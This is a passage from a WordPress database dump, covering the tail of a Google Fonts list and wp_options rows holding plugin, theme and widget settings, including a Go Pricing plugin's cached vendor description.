\"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yatraone/v14/C8ch4copsHzj8p7NaF0xw1OBbRDvXw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yellowtail\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yellowtail/v18/OZpGg_pnoDtINPfRIlLotlzNwED-b4g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yeon Sung\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yeonsung/v20/QldMNTpbohAGtsJvUn6xSVNazqx2xg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yeseva One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yesevaone/v20/OpNJno4ck8vc-xYpwWWxpipfWhXD00c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yesteryear\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yesteryear/v14/dg4g_p78rroaKl8kRKo1r7wHTwonmyw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yomogi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yomogi/v8/VuJwdNrS2ZL7rpoPWIz5NIh-YA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yrsa\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCjASNNV9rRPfrKu.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCieSNNV9rRPfrKu.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCisSNNV9rRPfrKu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaChAT9NV9rRPfrKu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCh5T9NV9rRPfrKu.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC2UW_LBte6KuGEo.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WCzsW_LBte6KuGEo.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WCwkW_LBte6KuGEo.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC-UR_LBte6KuGEo.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC9wR_LBte6KuGEo.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yuji Boku\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yujiboku/v5/P5sAzZybeNzXsA9xj1Fkjb2r2dgvJA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yuji Mai\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yujimai/v5/ZgNQjPxdJ7DEHrS0gC38hmHmNpCO.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yuji Syuku\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yujisyuku/v5/BngNUXdTV3vO6Lw5ApOPqPfgwqiA-Rk.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Yusei Magic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/yuseimagic/v11/yYLt0hbAyuCmoo5wlhPkpjHR-tdfcIT_.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"ZCOOL KuaiLe\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zcoolkuaile/v19/tssqApdaRQokwFjFJjvM6h2WpozzoXhC2g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"ZCOOL QingKe HuangYou\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zcoolqingkehuangyou/v15/2Eb5L_R5IXJEWhD3AOhSvFC554MOOahI4mRIi_28c8bHWA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"ZCOOL XiaoWei\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zcoolxiaowei/v14/i7dMIFFrTRywPpUVX9_RJyM1YFKQHwyVd3U.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Antique\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zenantique/v12/AYCPpXPnd91Ma_Zf-Ri2JXJq7PKP5Z_G.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Antique Soft\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zenantiquesoft/v12/DtV4JwqzSL1q_KwnEWMc_3xfgW6ihwBmkui5HNg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Dots\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zendots/v10/XRXX3ICfm00IGoesQeaETM_FcCIG.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Kaku Gothic Antique\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/zenkakugothicantique/v13/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22cM9TarWJtyZyGU.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/zenkakugothicantique/v13/6qLQKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB21-g3RKjc4d7.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/zenkakugothicantique/v13/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22dU9DarWJtyZyGU.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zenkakugothicantique/v13/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22cc8jarWJtyZyGU.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/zenkakugothicantique/v13/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22ck8DarWJtyZyGU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Kaku Gothic New\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/zenkakugothicnew/v13/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqpdKaWTSTGlMyd8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/zenkakugothicnew/v13/gNMYW2drQpDw0GjzrVNFf_valaDBcznOkjtiTWz5UGA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/zenkakugothicnew/v13/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqs9LaWTSTGlMyd8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zenkakugothicnew/v13/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqodNaWTSTGlMyd8.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/zenkakugothicnew/v13/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqr9PaWTSTGlMyd8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Kurenaido\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zenkurenaido/v12/3XFsEr0515BK2u6UUptu_gWJZfz22PRLd0U.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Loop\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zenloop/v7/h0GrssK16UsnJwHsEK9zqwzX5vOG.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/zenloop/v7/h0GtssK16UsnJwHsEJ9xoQj14-OGJ0w.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Maru Gothic\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/zenmarugothic/v12/o-0XIpIxzW5b-RxT-6A8jWAtCp-cQWpCPJqa_ajlvw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/zenmarugothic/v12/o-0SIpIxzW5b-RxT-6A8jWAtCp-k7UJmNLGG9A.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/zenmarugothic/v12/o-0XIpIxzW5b-RxT-6A8jWAtCp-cGWtCPJqa_ajlvw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zenmarugothic/v12/o-0XIpIxzW5b-RxT-6A8jWAtCp-cUW1CPJqa_ajlvw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/zenmarugothic/v12/o-0XIpIxzW5b-RxT-6A8jWAtCp-caW9CPJqa_ajlvw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Old Mincho\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"greek\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zenoldmincho/v11/tss0ApVaYytLwxTqcxfMyBveyYb3g31S2s8p.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/zenoldmincho/v11/tss3ApVaYytLwxTqcxfMyBveyb4Dqlla8dMgPgBu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/zenoldmincho/v11/tss3ApVaYytLwxTqcxfMyBveyb4vrVla8dMgPgBu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zenoldmincho/v11/tss3ApVaYytLwxTqcxfMyBveyb5LrFla8dMgPgBu.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/zenoldmincho/v11/tss3ApVaYytLwxTqcxfMyBveyb5zrlla8dMgPgBu.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zen Tokyo Zoo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zentokyozoo/v7/NGSyv5ffC0J_BK6aFNtr6sRv8a1uRWe9amg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zeyada\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zeyada/v15/11hAGpPTxVPUbgZDNGatWKaZ3g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zhi Mang Xing\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"chinese-simplified\",\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zhimangxing/v17/f0Xw0ey79sErYFtWQ9a2rq-g0actfektIJ0.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zilla Slab\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYpEY2HSjWlhzbaw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CVHapXnp2fazkfg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa6ZfeM_74wlPZtksIFWj0w_HyIRlE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa4ZfeM_74wlPZtksIFaj86-F6NVlFqdA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYskZ2HSjWlhzbaw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CDHepXnp2fazkfg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYuUe2HSjWlhzbaw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CIHCpXnp2fazkfg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYoEf2HSjWlhzbaw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CRHGpXnp2fazkfg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Zilla Slab Highlight\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/zillaslabhighlight/v17/gNMbW2BrTpK8-inLtBJgMMfbm6uNVDvRxhtIY2DwSXlM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/zillaslabhighlight/v17/gNMUW2BrTpK8-inLtBJgMMfbm6uNVDvRxiP0TET4YmVF0Mb6.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    }\n  ]\n}\n','yes');
INSERT INTO `dnctiavkr_options` VALUES
(221100,'ogf_no_bug','1','no'),
(335135,'wpforms_version_upgraded_from','1.8.3.1','yes'),
(335168,'give_version_upgraded_from','2.22.2','no'),
(335309,'wpb_license_errors','a:0:{}','yes'),
(335330,'license_key_token','','yes'),
(335332,'wpb_js_js_composer_purchase_code','','yes'),
(335381,'widget_presscore-photos','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(335382,'widget_presscore-testimonials-list','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(335383,'widget_presscore-testimonials-slider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(335949,'wpb_js_use_custom','1','yes'),
(335950,'wpb_js_vc_color','#f7f7f7','yes'),
(335951,'wpb_js_vc_color_hover','#F0F0F0','yes'),
(335952,'wpb_js_vc_color_call_to_action_bg','','yes'),
(335953,'wpb_js_vc_color_google_maps_bg','','yes'),
(335954,'wpb_js_vc_color_post_slider_caption_bg','','yes'),
(335955,'wpb_js_vc_color_progress_bar_bg','','yes'),
(335956,'wpb_js_vc_color_separator_border','','yes'),
(335957,'wpb_js_vc_color_tab_bg','','yes'),
(335958,'wpb_js_vc_color_tab_bg_active','','yes'),
(335959,'wpb_js_margin','35px','yes'),
(335960,'wpb_js_gutter','15','yes'),
(335961,'wpb_js_responsive_max','768','yes'),
(335962,'wpb_js_responsive_md','992','yes'),
(335963,'wpb_js_responsive_lg','1200','yes'),
(335965,'wpb_js_less_version','6.10.0','yes'),
(350199,'give_cache__give_ajax_works','a:2:{s:4:\"data\";s:1:\"1\";s:10:\"expiration\";i:1693029628;}','no'),
(350966,'db_upgraded','','yes'),
(351005,'can_compress_scripts','0','yes'),
(351683,'pdfemb','a:6:{s:12:\"pdfemb_width\";s:3:\"max\";s:13:\"pdfemb_height\";s:3:\"max\";s:14:\"pdfemb_toolbar\";s:6:\"bottom\";s:19:\"pdfemb_toolbarfixed\";s:3:\"off\";s:14:\"pdfemb_version\";s:5:\"4.6.4\";s:9:\"poweredby\";s:3:\"off\";}','yes'),
(351827,'category_children','a:0:{}','yes'),
(351905,'theme_mods_consultstreet','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:5;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1691948559;s:4:\"data\";a:7:{s:19:\"wp_inactive_widgets\";a:11:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";i:6;s:7:\"block-2\";i:7;s:7:\"block-3\";i:8;s:7:\"block-4\";i:9;s:7:\"block-5\";i:10;s:7:\"block-6\";}s:12:\"sidebar-main\";a:0:{}s:18:\"footer-sidebar-one\";a:0:{}s:18:\"footer-sidebar-two\";a:0:{}s:20:\"footer-sidebar-three\";a:0:{}s:19:\"footer-sidebar-four\";a:0:{}s:18:\"give-forms-sidebar\";a:0:{}}}}','yes'),
(351906,'go_pricing_api_cache','a:3:{s:12:\"last_checked\";i:1692966976;s:11:\"last_status\";i:200;s:8:\"requests\";a:1:{s:32:\"716a5c644e46e220ddde2db50e096d1e\";a:2:{s:4:\"data\";s:4443:\"{\"response\":\"success\",\"data\":{\"id\":\"go_pricing\",\"name\":\"Go Pricing - WordPress Responsive Pricing Tables\",\"shortname\":\"Go Pricing\",\"description\":\"<p style=\\\"margin-top: 0;\\\"><a href=\\\"https:\\/\\/codecanyon.net\\/item\\/go-pricing-wordpress-responsive-pricing-tables\\/3725820?ref=Granth\\\" rel=\\\"attachment wp-att-2744\\\"><img class=\\\"alignnone size-full wp-image-2767\\\" src=\\\"https:\\/\\/api-manager.granthweb.com\\/wp-content\\/uploads\\/gopr_logo.png\\\" alt=\\\"\\\" width=\\\"228\\\" height=\\\"50\\\" \\/><\\/a><\\/p>\\r\\n\\r\\n<h3 style=\\\"margin-top: 0;\\\">Create amazing WordPress Pricing &amp; Compare Tables<\\/h3>\\r\\nIt\\u2019s very easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you don\\u2019t need anything else.\\r\\n\\r\\nThis WordPress Pricing Tables supports various Media Elements like Audio, Video, Image or Map. Just give a try, we are sure you will never turn back to search more.\\r\\n<h3>Classic and Modern in one? Yes.<\\/h3>\\r\\nIf you like traditional WordPress Pricing Tables, but you would like get much more out of it, then this rodded product is a useful tool for you. Beside the usual pricing table style Videos (Youtube, Vimeo, Screenr) and Images are also supported with optional responsivity.\\r\\n\\r\\nIt\\u2019s very easy and fast to create stunning tables and integrate them into your WordPress site using <a href=\\\"https:\\/\\/www.youtube.com\\/watch?v=xCAd4oC5nRs&amp;index=1&amp;list=PL9NbJzjOaEKA3pC_kQrY1UBCXBrgiejOY\\\" target=\\\"_blank\\\" rel=\\\"noopener noreferrer\\\">Admin Panel<\\/a>. You will surely find the one most appropriate for you, which can be customized in a few seconds.\\r\\n<h3>For what other purposes can I you use this? We have some ideas.<\\/h3>\\r\\nBeside traditional Pricing Tables feature the plugin is suitable also for creating Team Viewer and Compare Tables. These features can also be found in the package.\\r\\n<h3>Is the sytem flexible? Yes.<\\/h3>\\r\\nThe responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).\\r\\n<h3>Can I use more than one table on my site? Yes.<\\/h3>\\r\\nYou can use any number of tables on your site or even on one single page using shortcodes.\\r\\n\\r\\n<strong>Go. Just Create!.<\\/strong>\\r\\n\\r\\n&nbsp;\",\"short_description\":\"\",\"tagline\":\"\",\"thumbnail\":\"https:\\/\\/api-manager.granthweb.com\\/wp-content\\/uploads\\/gopr_thumb_80.png\",\"url\":\"https:\\/\\/codecanyon.net\\/item\\/go-pricing-wordpress-responsive-pricing-tables\\/3725820?ref=Granth\",\"purchase_url\":\"https:\\/\\/codecanyon.net\\/item\\/go-pricing-wordpress-responsive-pricing-tables\\/3725820?ref=Granth\",\"core_min\":\"\",\"wp_min\":\"3.5\",\"wp_max\":\"5.7.2\",\"version\":\"3.3.19\",\"date\":\"18-06-2021\",\"addons\":{\"clip_addon\":{\"id\":\"clip_addon\",\"name\":\"Clip - Add-on for Go Pricing\",\"shortname\":\"Clip\",\"description\":\"\",\"short_description\":\"By using \'Clip \\u2013 Add-on for Go Pricing\' you can get pricing tables done way faster than before. You can add a Row or the entire content of a Column to the Clipboard by simply one click, they also can be reloaded using the Drag & Drop tool.\",\"tagline\":\"It\'s more than just Copy Paste\",\"thumbnail\":\"https:\\/\\/api-manager.granthweb.com\\/wp-content\\/uploads\\/gopr_clip_thumb_80.png\",\"url\":\"https:\\/\\/codecanyon.net\\/item\\/clip-addon-for-go-pricing\\/13216605?ref=Granth\",\"purchase_url\":\"https:\\/\\/codecanyon.net\\/item\\/clip-addon-for-go-pricing\\/13216605?ref=Granth\",\"core_min\":\"3.1.1\",\"wp_min\":\"3.5\",\"wp_max\":\"4.9.6\",\"version\":\"2.0\",\"date\":\"21-04-2016\"},\"yet_addon\":{\"id\":\"yet_addon\",\"name\":\"Yet Skin - Add-on for Go Pricing\",\"shortname\":\"Yet Skin\",\"description\":\"\",\"short_description\":\"Yet will enable you to create totally unique tables that fit perfectly to your style and theme.\\r\\nExpress your tables in complete freedom, this time only your imagination is the limit. Yet is a skin that expands your table editing capabilities by letting you configuring almost anything without coding knowledge.\",\"tagline\":\"Turbo-Charge with Creative\\r\\nStyles \",\"thumbnail\":\"https:\\/\\/api-manager.granthweb.com\\/wp-content\\/uploads\\/gopr_yet_thumb_80.png\",\"url\":\"https:\\/\\/codecanyon.net\\/item\\/yet-skin-addon-for-go-pricing\\/17449027?ref=Granth\",\"purchase_url\":\"https:\\/\\/codecanyon.net\\/item\\/yet-skin-addon-for-go-pricing\\/17449027?ref=Granth\",\"core_min\":\"3.3.2\",\"wp_min\":\"3.5\",\"wp_max\":\"4.9.6\",\"version\":\"1.2\",\"date\":\"16-08-2017\"}}},\"created_at\":\"05-08-2021 08:13:18 +00:00\"}\";s:4:\"time\";i:1692966976;}}}','no'),
(351907,'go_pricing_update_data','a:1:{s:13:\"gw-go-pricing\";a:5:{s:2:\"id\";s:10:\"go_pricing\";s:4:\"slug\";s:13:\"gw-go-pricing\";s:4:\"base\";s:25:\"go_pricing/go_pricing.php\";s:7:\"version\";s:6:\"3.3.19\";s:8:\"api_data\";a:14:{s:2:\"id\";s:10:\"go_pricing\";s:4:\"name\";s:48:\"Go Pricing - WordPress Responsive Pricing Tables\";s:9:\"shortname\";s:10:\"Go Pricing\";s:11:\"description\";s:2060:\"<p style=\"margin-top: 0;\"><a href=\"https://codecanyon.net/item/go-pricing-wordpress-responsive-pricing-tables/3725820?ref=Granth\" rel=\"attachment wp-att-2744\"><img class=\"alignnone size-full wp-image-2767\" src=\"https://api-manager.granthweb.com/wp-content/uploads/gopr_logo.png\" alt=\"\" width=\"228\" height=\"50\" /></a></p>\r\n\r\n<h3 style=\"margin-top: 0;\">Create amazing WordPress Pricing &amp; Compare 